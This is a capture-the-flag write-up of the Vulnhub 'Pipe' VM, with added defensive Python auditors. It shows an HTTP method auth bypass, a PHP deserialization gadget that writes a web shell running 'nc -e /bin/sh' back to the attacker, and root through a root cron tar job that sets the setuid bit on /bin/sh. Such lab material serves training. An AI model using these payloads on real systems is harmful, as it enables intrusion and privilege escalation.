/dev/random: Pipe from Vulnhub
root@kali:~/Security/pipe# nmap 192.168.0.118 -p- -T5 -n
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-21 04:55 CST
Warning: 192.168.0.118 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.118
Host is up (0.00019s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
35856/tcp open unknown
MAC Address: 08:00:27:D7:0B:8C (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 513.72 seconds
nmap turned up four open ports; let's look at port 80 first.
...the first time I've run into a site whose index page itself demands a username and password.
No idea what 35856 is for, so let's scan it in more depth.
root@kali:~/Security/pipe# nmap 192.168.0.118 -p 22,80,111,35856 -A -O
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
| 2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_ 256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp open http Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35856/tcp status
|_ 100024 1 44438/udp status
35856/tcp open status 1 (RPC #100024)
It turns out to be the port mapped to RPC (the status service).
Not knowing what to do with that, I went back to the web page and tried things at random.
Eventually I found that as long as the request method is anything other than GET, the authentication is bypassed.
Next, let's inspect the source code.
<script src="scriptz/php.js"></script>
<script>
function submit_form() {
    var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'});
    object = object.substr(object.indexOf("{"),object.length);
    object = "O:4:\"Info\":4:" + object;
    document.forms[0].param.value = object;
    document.getElementById('info_form').submit();
}
...
<form action="index.php" id="info_form" method="POST">
    <input type="hidden" name="param" value="" />
    <a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>
The scriptz directory has directory listing enabled, and from it I obtained another file, "log.php.BAK".
This class writes the contents of data into filename when it is destructed.
<?php
class Log
{
    public $filename = '';
    public $data = '';
    public function __construct()
    {
        $this->filename = '';
        $this->data = '';
    }
    public function PrintLog()
    {
        $pre = "[LOG]";
        $now = date('Y-m-d H:i:s');
        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }
    public function __destruct()
    {
        file_put_contents($this->filename, $this->data, FILE_APPEND);
    }
}
?>
After clicking Show Artist Info at the bottom of the page, the browser POSTs some serialized information to index.php:
param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The+Treachery+of+Images";}
The serialize implementation is in php.js:
// example 1: serialize(['Kevin', 'van', 'Zonneveld']);
// returns 1: 'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'
// example 2: serialize({firstName: 'Kevin', midName: 'van', surName: 'Zonneveld'});
// returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'
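A defender's check for the object-injection issue above, added here as an example (not code from the VM or the original post): a small parser for the PHP serialize() format that php.js produces, used to flag any object in the POST `param` whose class is not on an allowlist. ALLOWED_CLASSES, the Log request body with placeholder data, and the ASCII-only input assumption are mine.

```python
from urllib.parse import unquote_plus

# Classes index.php legitimately expects inside "param" (assumed for this example).
ALLOWED_CLASSES = {"Info"}

def parse_php(s, i=0):
    """Parse a PHP serialize() value at s[i] -> (value, next_index); ASCII assumed (PHP lengths are bytes)."""
    t = s[i]
    if t == "i":                                      # i:1;
        end = s.index(";", i)
        return int(s[i + 2:end]), end + 1
    if t == "s":                                      # s:4:"Rene";
        colon = s.index(":", i + 2)
        n, start = int(s[i + 2:colon]), colon + 2
        return s[start:start + n], start + n + 2
    if t in "aO":                                     # a:3:{...}  O:3:"Log":2:{...}
        num_at, cls = i + 2, None                     # where the element-count digits start
        colon = s.index(":", i + 2)
        if t == "O":
            name_len = int(s[i + 2:colon])
            cls = s[colon + 2:colon + 2 + name_len]
            num_at = colon + 4 + name_len             # property count follows the closing ":
            colon = s.index(":", num_at)
        count = int(s[num_at:colon])
        props, j = {}, colon + 2                      # skip ':{'
        for _ in range(count):
            key, j = parse_php(s, j)
            props[key], j = parse_php(s, j)
        if s[j] != "}":
            raise ValueError("malformed container at offset %d" % j)
        # arrays come back as dicts, objects as ("object", classname, props)
        return (("object", cls, props) if t == "O" else props), j + 1
    raise ValueError("unsupported type %r at offset %d" % (t, i))

def audit_param(post_body):
    """Return [(class, props)] for every object in a 'param=...' body whose class
    is not allowed; an empty list means the payload only carries expected types."""
    value, _ = parse_php(unquote_plus(post_body.split("param=", 1)[1]))
    findings = []
    def walk(v):
        if isinstance(v, tuple):                      # ("object", cls, props)
            if v[1] not in ALLOWED_CLASSES:
                findings.append((v[1], v[2]))
            walk(v[2])
        elif isinstance(v, dict):
            for item in v.values():
                walk(item)
    walk(value)
    return findings

# Captured request from the page, plus a constructed Log gadget with placeholder data.
INFO_BODY = 'param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The+Treachery+of+Images";}'
LOG_BODY = 'param=O:3:"Log":2:{s:8:"filename";s:31:"/var/www/html/scriptz/shell.php";s:4:"data";s:11:"PLACEHOLDER";}'
```

Server-side, the equivalent guard is PHP 7's `unserialize($param, ['allowed_classes' => ['Info']])`, or dropping serialize() for JSON, so that a Log object is never instantiated and its __destruct never runs.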
Next I changed the contents of submit_form() to the data I wanted to send.
I chose to write into scriptz because I can go straight into the scriptz directory listing to confirm whether the write succeeded,
and the contents of data do appear to have been written to yo.php successfully.
Now let's try sending a reverse shell back.
Edit the HTML directly:
<script>
function submit_form() {
    var object = serialize({filename: '/var/www/html/scriptz/shell.php', data: '<?php passthru("nc -e /bin/sh 192.168.0.115 22234"); ?>'});
    object = object.substr(object.indexOf("{"),object.length);
    object = "O:3:\"Log\":2:" + object;
    document.forms[0].param.value = object;
    document.getElementById('info_form').submit();
}
</script>
After opening http://192.168.0.117/scriptz/shell.php the browser hangs:
root@kali:~/Security/pipe# nc -lp 22234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux pipe 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64 GNU/Linux
shell GET!
After some quick information gathering I found a user, rene, whose home directory has no permissions restricting access:
ls -al
total 208
drwxrwxrwx 2 rene rene 4096 Dec 23 05:04 .
drwxr-xr-x 3 rene rene 4096 Jul 6 07:42 ..
-rw-r--r-- 1 rene rene 124078 Dec 23 05:00 backup.tar.gz
-rw-r--r-- 1 rene rene 26558 Dec 23 05:02 sys-12512.BAK
-rw-r--r-- 1 rene rene 11402 Dec 23 05:01 sys-23924.BAK
-rw-r--r-- 1 rene rene 7231 Dec 23 05:04 sys-2448.BAK
-rw-r--r-- 1 rene rene 27182 Dec 23 05:03 sys-5018.BAK
The backup directory appears to get a new file every minute, and every five minutes they are packed into backup.tar.gz.
Presumably a cron job is running; /etc/crontab happens to be readable, so let's look at the cron configuration:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh
Only the contents of /usr/bin/compress.sh can be read:
cat compress.sh
#!/bin/sh
rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK
With PATH set the way it is here, hijacking a command through PATH isn't possible,
so I simply set the setuid bit on /bin/sh instead (chmod u+s):
echo "chmod u+s /bin/sh" > shell.sh
Once the scheduled time comes around, root privileges are obtained:
# sh
sh
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cat /root/flag.txt
cat /root/flag.txt
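As an added defensive example (not part of the original post), a small crontab auditor that flags the misconfiguration this escalation relies on: a root cron job whose script operates inside a directory owned by another user. The FAKE_FS stat table, the SCRIPTS mapping and the CRONTAB text are constructed from the ls -al, compress.sh and /etc/crontab output above; a real audit would read them from the host.

```python
import re
# Constructed stat() stand-in (path -> (owner, mode)) matching the ls -al and
# crontab shown above; a real audit would call os.stat on the live host.
FAKE_FS = {
    "/root/create_backup.sh": ("root", 0o700),
    "/usr/bin/compress.sh": ("root", 0o755),
    "/home/rene/backup": ("rene", 0o777),           # drwxrwxrwx rene rene
}
# Body of the root-run script from the page, so the auditor can inspect the paths it touches.
SCRIPTS = {"/usr/bin/compress.sh": "rm -f /home/rene/backup/backup.tar.gz\n"
           "cd /home/rene/backup\ntar cfz /home/rene/backup/backup.tar.gz *\n"}

CRON_JOB = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")  # 5 time fields, user, command
ABS_PATH = re.compile(r"(?<![\w./-])/[\w./-]+")                       # absolute paths in a command

def first_non_root_writable(path, fs):
    """Return path or the nearest known ancestor that a non-root user controls
    (non-root owner, or group/other-writable), else None."""
    while path:
        if path in fs:
            owner, mode = fs[path]
            if owner != "root" or mode & 0o022:
                return path
        path = path.rpartition("/")[0]
    return None

def audit_crontab(crontab, fs, scripts):
    """Return (command, offending_path) for every root job whose command line, or the
    script it runs, references a path under non-root control."""
    findings = set()
    for line in crontab.splitlines():
        line = line.strip()
        m = CRON_JOB.match(line)
        if line.startswith("#") or not m or m.group("user") != "root":
            continue
        cmd = m.group("cmd")
        paths = set(ABS_PATH.findall(cmd))
        for p in list(paths):                      # follow one level into scripts we can read
            paths |= set(ABS_PATH.findall(scripts.get(p, "")))
        for p in paths:
            if bad := first_non_root_writable(p, fs):
                findings.add((cmd, bad))
    return sorted(findings)

CRONTAB = """\
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh
"""
```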
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7